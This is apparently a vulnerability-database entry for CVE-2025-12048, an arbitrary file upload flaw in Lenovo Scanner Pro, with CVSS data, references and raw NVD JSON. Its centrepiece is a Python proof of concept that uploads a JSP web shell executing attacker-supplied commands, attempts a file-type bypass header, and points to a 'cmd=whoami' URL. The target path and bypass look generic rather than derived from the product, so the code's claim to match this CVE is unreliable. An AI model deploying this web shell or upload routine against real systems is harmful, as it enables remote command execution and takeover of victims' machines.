CVE-2025-12048

Description

An arbitrary file upload vulnerability was reported in the Lenovo Scanner Pro client during an internal security assessment that could allow remote code execution or unauthorized control of the affected system.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Lenovo Scanner Pro < 1.0.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12048 PoC - Lenovo Scanner Pro Arbitrary File Upload
# This PoC demonstrates the file upload vulnerability

import requests
import json

TARGET_URL = "http://target:8080/ScannerPro/upload"
PAYLOAD_FILENAME = "malicious.jsp"
PAYLOAD_CONTENT = "<%@ page import=\"java.util.*,java.io.*\" %>\n<% if(request.getParameter(\"cmd\")!=null){ Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while(disr!=null){ out.println(disr); disr = dis.readLine(); } } %>"

def exploit_file_upload():
    """Exploit arbitrary file upload vulnerability"""
    files = {
        'file': (PAYLOAD_FILENAME, PAYLOAD_CONTENT, 'application/octet-stream')
    }
    
    # Bypass file type restrictions
    headers = {
        'X-Original-Filename': PAYLOAD_FILENAME,
        'Content-Type': 'multipart/form-data'
    }
    
    try:
        response = requests.post(TARGET_URL, files=files, headers=headers, timeout=10)
        
        if response.status_code == 200:
            result = response.json()
            uploaded_path = result.get('filePath', '/uploads/' + PAYLOAD_FILENAME)
            print(f"[+] File uploaded successfully to: {uploaded_path}")
            print(f"[+] Access payload at: {uploaded_path}?cmd=whoami")
            return uploaded_path
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return None

if __name__ == "__main__":
    print("CVE-2025-12048 PoC - Lenovo Scanner Pro Arbitrary File Upload")
    print("=" * 60)
    exploit_file_upload()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12048
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12048
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12048/
[4] VulDB https://vuldb.com/cve/CVE-2025-12048
[5] https://iknow.lenovo.com.cn/detail/434326

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12048", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:37.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability was reported in the Lenovo Scanner Pro client during an internal security assessment that could allow remote code execution or unauthorized control of the affected system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://iknow.lenovo.com.cn/detail/434326", "source": "[email protected]"}]}}